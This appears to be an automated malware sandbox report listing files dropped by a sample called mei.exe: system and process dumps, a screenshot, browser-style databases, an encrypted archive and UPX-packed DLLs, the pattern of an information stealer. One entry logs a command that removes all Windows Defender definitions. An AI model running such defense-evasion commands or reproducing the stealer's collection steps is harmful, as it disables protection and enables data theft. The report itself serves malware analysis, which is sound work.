                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                    Entropy (8bit):4.004364184708143
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:NWMd/PgGn:lpgG
                                                                                                                                                                    MD5:BBC02B9E6ABE2582E89EC3EB60BA9224
                                                                                                                                                                    SHA1:09D5F33BEAA9FEC4C830514C75D45E18B93B6C16
                                                                                                                                                                    SHA-256:3C155AEC9E2C9D9CC509F66A349B5A8CA0ED0DA32B81A6B373E5C07313A1D97F
                                                                                                                                                                    SHA-512:DD6EDC3C907A2E43BAA664B31C47B7BC6C7E6BB727F88A98B060126FB4D2A88089088A510639D75F018B514D52DC8A8F32E5F06371877662CCBE1CD87B36D530
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Music..No subfolders exist ..
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                    Entropy (8bit):4.312345549900582
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:rT5JXsqU3vFvABPHc:rjcqU3xMc
                                                                                                                                                                    MD5:3AAA42DD87BD37A58BAB747F15957A92
                                                                                                                                                                    SHA1:06177000882B63BF411FD773C5C48B9BA9D1F1E7
                                                                                                                                                                    SHA-256:D707C8B66E809464D8694719A13C8E1CA96E296F81EDB49A5D0F026E73CA61C0
                                                                                                                                                                    SHA-512:391276BF352F4EC29CA8081DEF96EC1800D50D25D147127F717AFE73AA588DDC58F122819C12F1CB7F28C2740B187395FBCA92927518AB07A1A92A93AA9A933E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Pictures..... Camera Roll..... Saved Pictures
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):30
                                                                                                                                                                    Entropy (8bit):3.8980685120588388
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:kbFPgGn:k5gG
                                                                                                                                                                    MD5:E140E10B2B43BA6F978BEE0AA90AFAF7
                                                                                                                                                                    SHA1:BBBEB7097FFA9C2DAA3206B3F212D3614749C620
                                                                                                                                                                    SHA-256:C3A706E5567CA4EB3E18543296FA17E511C7BB6BEF51E63BF9344A59BF67E618
                                                                                                                                                                    SHA-512:DF5B92757BF9200D0945AFDA94204B358B9F78C84FBAEB15BDF80EAE953A7228F1C19FDF53ED54669562B8F0137623EA6CEE38F38EF23A6F06DE1673FF05733F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Videos..No subfolders exist ..
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):703924
                                                                                                                                                                    Entropy (8bit):7.928286534541553
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:uwaVun7Omc3Ae/foOJDnxVjYd5sg8mngu4gzRoUEx3HHjkDut9fFkLCts8:uwdn7JJHO9ncT8OidljF9fS8
                                                                                                                                                                    MD5:E0173B045E7ADAAA5C94E44ED98DFA75
                                                                                                                                                                    SHA1:D51A1206BF59833C21682C9F222F1C80C8D966A5
                                                                                                                                                                    SHA-256:6B750E4DBC9D2CB69AFB84A37B2D0E3D623B74049A7D48CE0F70B2F2AF3C2AB5
                                                                                                                                                                    SHA-512:B7DB0EDEACCFD1A19B4B7B7ACBAAD238AC8EB95F9042F580E929C6B40A211C10223B6EA664600A818BF02C53D6DA99C64695C5FCB28BCD1D759C24F6BBC4E2F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y...../&.Z./..y..L.....nZ....p%@.y...@x...... ..9...{o........o..?...u]....."~..^{.}.Y.*...9.....R.^..f.h.m..^.K...u....S....i.l?w8.N..E...v_.d&..8A...S...e.+6.........c_.i.....O.TZ....c.3=i.m..`..>...Q.>...c..u...1v..i...i.>.i1..Gg....)./=<.c../>4mZ_x.a......?8.....dl.a......9..?w...g...}...}V..j .>35..eO...>...O.zc<`...7....E...z3..v_.}..=..;f.#.d.............g....+........q...wN.;..w.s.~..^v{j.v[...;.ewLb|..3c..[b.......+.oy.1{.w.5.v5v.%-.............v..1.W.......3...tK.[...i...N7...../..=...;.c.v.9.....h.......Mil..S{..Rk..s.....YLcA>...oI.,g...Y........<.x..io}]n}l.G[B..msC....[.x|k...L{.k...nI...}..si.lc.}..6.7.&..[..luMfl.S{.....m.Z.6.2......._KK....Y....5..X.y[....._.a..u...7.yC..M..oz...=.0...2...&...v..W..............^...9.0.....A{..v.&.fc.[j..x.F....i|C....)O.g..[..}.....[.\..._..Z.].c.....s....oc....b...5
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                    Entropy (8bit):3.452819531114783
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:jBJiA7X:jBJiA7X
                                                                                                                                                                    MD5:01DAEFE4CAF17BE6854E1A9A0DECE70C
                                                                                                                                                                    SHA1:FEE51C1AB6684F18E59F3FFA9C0296ED1E5DBD28
                                                                                                                                                                    SHA-256:2331BE85A81C008DEDBFEF3BFB0D68EF76AC6BEE37CF9E653591790A21DBBF32
                                                                                                                                                                    SHA-512:AA934777ECB3097CD820EDED81C9C7BAF68039A7E448CEC067317565427212882301BA517ADFB5F63A6677E7D80BAF15837F05DC8C9A9D2BD80F3CA65234ED16
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Windows Defender
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):232
                                                                                                                                                                    Entropy (8bit):3.7605500911024685
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:8LGg0W/FLyzdAFFFFmQmeJIMLrX6H7RuRdP8xBn:8yg0G5ym/mQr/krn
                                                                                                                                                                    MD5:4CDDA0F16FD961C79CC7F6C992162A72
                                                                                                                                                                    SHA1:E2902F6BFCD9323FF0602505A3407D5C95D3016D
                                                                                                                                                                    SHA-256:13294CD8F37E28ED0C467A38BA5835243F42370814683A60D78E6A96FB4A5F64
                                                                                                                                                                    SHA-512:1B925264C378E4B73E8210038257A066254A0C5C3C3CCFF42DDD0C87A6F134D616B1A83C9AD2070051F06858CB072C9818820237D60CC3D559BD6FDE162AC127
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2266
                                                                                                                                                                    Entropy (8bit):4.497973123152564
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:FjuD3CC2+P3zGGGK/WI49xrsoG7dQhk4m0EjcCGuJUbG3FRZ3:FjuDyC2+yK8xgvdQeKL+Uq1n
                                                                                                                                                                    MD5:95CE12BA5540AD3072B95CE979ED4443
                                                                                                                                                                    SHA1:D4482FB20848EBBEDEA87CD266564C6ED08E6041
                                                                                                                                                                    SHA-256:699F7F2EF5F749D4AA1FE7F037007C8B115ACC44E54235BBA55BE40B16CE31E2
                                                                                                                                                                    SHA-512:8842797D53C0A8AE332B04E36A0381539E0596EFD643E5F4C182C79278CD29683532A7E27C5BB1A6E6603541735A40D9AE9950F0E4B7147B81189ABA6D1F78A2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: hardz..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 03/10/2023, 09:57:18..System Boot Time: 24/09/2023, 13:00:03..System Manufacturer: Has4HsYbMzGGxKC..System Model: rxugfTwo..System Type: x64-based PC..Processor(s): 2 Processor(s) Installed... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz.. [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz..BIOS Version: 4CDTT RCA6N, 21/11/2022..Windows Directory: C:\Windows..System Directory: C:\Window
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28794
                                                                                                                                                                    Entropy (8bit):4.6522328913806295
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:Di3wadWI8h5RXSBFoxYVvgT6SBetMbxwklr5ixnfTINnZ5yKgaYt61ty30WSVtFN:Wwn75UyGVc6SBewL09MXx
                                                                                                                                                                    MD5:E666E9EF75A7304E6079363CA38842C7
                                                                                                                                                                    SHA1:3E6FCDAB7210F61EC22553658E29726E1B057D12
                                                                                                                                                                    SHA-256:FA265895B4CB38E8137EA93FF1703B6B2E495245FC2FD181BD134A407F7F6B80
                                                                                                                                                                    SHA-512:587C3AF54F5004425E09ECDB2FE4FC3E404583B115507CF024FA52D4058C1B4D8FC8616E1519215670F44200C3367051A208D2305A7FFC210E5CBD826EA212C3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Image Name: System Idle Process..PID: 0..Session Name: Services..Session#: 0..Mem Usage: 8 K....Image Name: System..PID: 4..Session Name: Services..Session#: 0..Mem Usage: 176 K....Image Name: Registry..PID: 92..Session Name: Services..Session#: 0..Mem Usage: 79'456 K....Image Name: smss.exe..PID: 324..Session Name: Services..Session#: 0..Mem Usage: 1'236 K....Image Name: csrss.exe..PID: 408..Session Name: Services..Session#: 0..Mem Usage: 5'304 K....Image Name: wininit.exe..PID: 484..Session Name: Services..Session#: 0..Mem Usage: 7'252 K....Image Name: csrss.exe..PID: 492..Session Name: Console..Session#: 1..Mem Usage: 6'148 K....Image Name: winlogon.exe..PID: 552..Session Name: Console..Session#: 1..Mem Usage: 16'696 K....Image Name: services.exe..PID: 620..Session Name: Services..Session#: 0..Mem Usage: 12'224 K....Image N
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):114688
                                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):894
Entropy (8bit):3.1177671840990877
Encrypted:false
SSDEEP:12:Q58KRBubdpkoPAGdjrlsV2lWywZk9+MlWlLehW51ICEsV2lWyQI:QOaqdmOFdjrl/8++kWResLIN/cI
MD5:3FBAADA3D52A6F380EA82846CD64138D
SHA1:198127FF74E089370F6465D283715328061117A8
SHA-256:9874B4E559F9D2177225689212F10665CCCF24624E0F38306DC142911A747C4D
SHA-512:6052B55DAC267CC3440A185EF3FE07A9248E2A1186C66B3C73B2999B00FF524AED3C3AEE10B8B808AEF5C2027A1CE7DEA27CD3591C19AEA53BE59A64207FCCE0
Malicious:false
Reputation:unknown
Preview (UTF-16 text decoded):
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Start Time: Wed Dec 06 2023 09:24:15
MpEnsureProcessMitigationPolicy: hr = 0x1
Start: MpRemoveDefinitions(1)
MpCmdRun: End Time: Wed Dec 06 2023 09:24:15
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Wed Dec 6 09:27:15 2023, 1st section name ".debug$S"
Category:dropped
Size (bytes):1372
Entropy (8bit):4.12309006501808
Encrypted:false
SSDEEP:24:H+q9UZfINcYDfH2wKMfbNwI+ycuZhNgakSsPNnqS+d:oBIND1KYbm1ulga38qSe
MD5:9556A82DB03378252FB194E574B3F665
SHA1:544256FFA305521303EE465DF891D85DFC94188A
SHA-256:119547CCA24D2A3BAC3B75383FE490C43C597D96581F0F408598A198269659B3
SHA-512:46047CD55282ED241E88798F4BBFE225D37BCF338D7CB83021B6586A61F0359CF8F036DAF169946A6D377A4DFF08539987064ABDD48123C6AE84FF8E62B67C3C
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):694830
Entropy (8bit):7.999694094540915
Encrypted:true
SSDEEP:12288:Iklcw7Aqld4vI9u3e7GQVpG8/7NRVe8dXFE/xy+DtIAPagbLpufE0JcRAt3j41DU:Plcw7Ac9/7e8jNa//xTDtIAPWEKeAB0U
MD5:EAD1CA1AB936C64498A14EE3424DA7C1
SHA1:A8A991416561424A4ABF9032F704D2C62ADA762D
SHA-256:7D415CE5C937AC10FB2A2BD0D0B42B102CA4F1F02BA22A8507F33EF2DCB42F69
SHA-512:6852F9D7114ADE4807F7F490DCA9892404805896B835C2FD4B10BE12D6F0211239C0851883AE0601B505499AE1D978B77830FD719EE555F70A5B2D4ECF214179
Malicious:false
Reputation:unknown
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):109392
Entropy (8bit):6.641929675972235
Encrypted:false
SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Reputation:unknown
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49432
Entropy (8bit):7.8135914033786475
Encrypted:false
SSDEEP:1536:65xdYKhY/Y5bQMskWu3IVCVJv7SyhJDxhy:yxdYKS/Y5RJRIVCVJvXpy
MD5:20A7ECFE1E59721E53AEBEB441A05932
SHA1:A91C81B0394D32470E9BEFF43B4FAA4AACD42573
SHA-256:7EBBE24DA78B652A1B6FE77B955507B1DAFF6AF7FF7E5C3FA5AC71190BDE3DA8
SHA-512:99E5D877D34EBAAAEB281C86AF3FFF9D54333BD0617F1366E3B4822D33E23586EF9B11F4F7DD7E1E4A314C7A881F33123735294FE8AF3A136CD10F80A9B8D902
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 1%
Reputation:unknown
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59672
Entropy (8bit):7.82957734909026
Encrypted:false
SSDEEP:1536:aMUOlRrHrPcX1nBeXfeIO/h8mLwj46IVLPZp7SyIx9:aBOLL0FnIXm/yk6IVLPZpo
MD5:5006B7EA33FCE9F7800FECC4EB837A41
SHA1:F6366BA281B2F46E9E84506029A6BDF7948E60EB
SHA-256:8F7A5B0ABC319BA9BFD11581F002E533FCBE4CA96CEDD37656B579CD3942EF81
SHA-512:E3E5E8F471A8CA0D5F0091E00056BD53C27105A946CA936DA3F5897B9D802167149710404386C2ED3399B237B8DA24B1A24E2561C436ED2E031A8F0564FBBC7C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Reputation:unknown
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):109336
Entropy (8bit):7.933037133644081
Encrypted:false
SSDEEP:1536:9Ot51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:AzanBZkGlmRc1en8R/iIVOqHC0r
MD5:D0231F126902DB68D7F6CA1652B222C0
SHA1:70E79674D0084C106E246474C4FB112E9C5578EB
SHA-256:69876F825678B717C51B7E7E480DE19499D972CB1E98BBFD307E53EE5BACE351
SHA-512:B6B6BFD5FDE200A9F45AEB7F6F845EAC916FEEEF2E3FCA54E4652E1F19D66AE9817F1625CE0ED79D62E504377011CE23FD95A407FBDBAA6911A09E48B5EF4179
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 3%
Reputation:unknown
Process:C:\Users\user\Desktop\mei.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):36632
Entropy (8bit):7.654026577022311
Encrypted:false
SSDEEP:768:V35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:R5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
MD5:A81E0DF35DED42E8909597F64865E2B3
SHA1:6B1D3A3CD48E94F752DD354791848707676CA84D
SHA-256:5582F82F7656D4D92ED22F8E460BEBD722E04C8F993C3A6ADCC8437264981185
SHA-512:2CDA7348FAFFABC826FB7C4EDDC120675730077540F042D6DC8F5E6921CF2B9CB88AFCD114F53290AA20DF832E3B7A767432EA292F6E5B5B5B7D0E05CF8905A6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):87832
                                                                                                                                                                    Entropy (8bit):7.91494851779059
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:0xMcTNiSSlZFto5ChAwRYMekiq/xFQhIHFB38EtW9ue20dcwfgpPzLNLJcIVZ1Ch:ATJitRLeZq/fZH3Ns9D2WcGgthLGIVZI
                                                                                                                                                                    MD5:F8B61629E42ADFE417CB39CDBDF832BB
                                                                                                                                                                    SHA1:E7F59134B2BF387A5FD5FAA6D36393CBCBD24F61
                                                                                                                                                                    SHA-256:7A3973FEDD5D4F60887CF0665BCB7BD3C648AD40D3AE7A8E249D875395E5E320
                                                                                                                                                                    SHA-512:58D2882A05289B9D17949884BF50C8F4480A6E6D2B8BD48DFDBCB03D5009AF64ABF7E9967357AEEBF95575D7EF434A40E8AD07A2C1FE275D1A87AA59DCC702D6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T"#.5Lp.5Lp.5Lp.M.p.5Lp.IMq.5Lp.IIq.5Lp.IHq.5Lp.IOq.5LpnHMq.5Lp.MMq.5Lp.5Mp.5LpnHAq.5LpnHLq.5LpnH.p.5LpnHNq.5LpRich.5Lp................PE..d......e.........." ...#. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26392
                                                                                                                                                                    Entropy (8bit):7.484232189428478
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:PtihFuym2pDjIVQU8v5YiSyvyxAMxkE44:sXmqjIVQU8B7Sy+xE4
                                                                                                                                                                    MD5:0DA22CCB73CD146FCDF3C61EF279B921
                                                                                                                                                                    SHA1:333547F05E351A1378DAFA46F4B7C10CBEBE3554
                                                                                                                                                                    SHA-256:E8AE2C5D37A68BD34054678AE092E2878F73A0F41E6787210F1E9B9BB97F37A0
                                                                                                                                                                    SHA-512:9EECE79511163EB7C36A937F3F2F83703195FC752B63400552CA03D0D78078875FF41116EBAEB05C48E58E82B01254A328572096A17AAAD818D32F3D2D07F436
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:WX.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.L[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........PE..d......e.........." ...#.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):44312
                                                                                                                                                                    Entropy (8bit):7.717509871918743
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:woQ8MABQVaAwmySb0TrgeBYdEpZbqIVLwJF65YiSyvTAMxkEY:woTIzwF/JbqIVLwJFY7SyLxU
                                                                                                                                                                    MD5:C12BDED48873B3098C7A36EB06B34870
                                                                                                                                                                    SHA1:C32A57BC2FC8031417632500AA9B1C01C3866ADE
                                                                                                                                                                    SHA-256:6C4860CB071BB6D0B899F7CA2A1DA796B06EA391BAC99A01F192E856725E88AA
                                                                                                                                                                    SHA-512:335510D6F2F13FB2476A5A17445CA6820C86F7A8A8650F4FD855DD098D022A16C80A8131E04212FD724957D8785AD51CCAFF532F2532224CCFD6CE44F4E740F9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.+.".E.".E.".E.+...$.E...D. .E...@./.E...A.*.E...F.!.E...D. .E.".D...E.i.D.%.E...H.#.E...E.#.E....#.E...G.#.E.Rich".E.........................PE..d......e.........." ...#.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
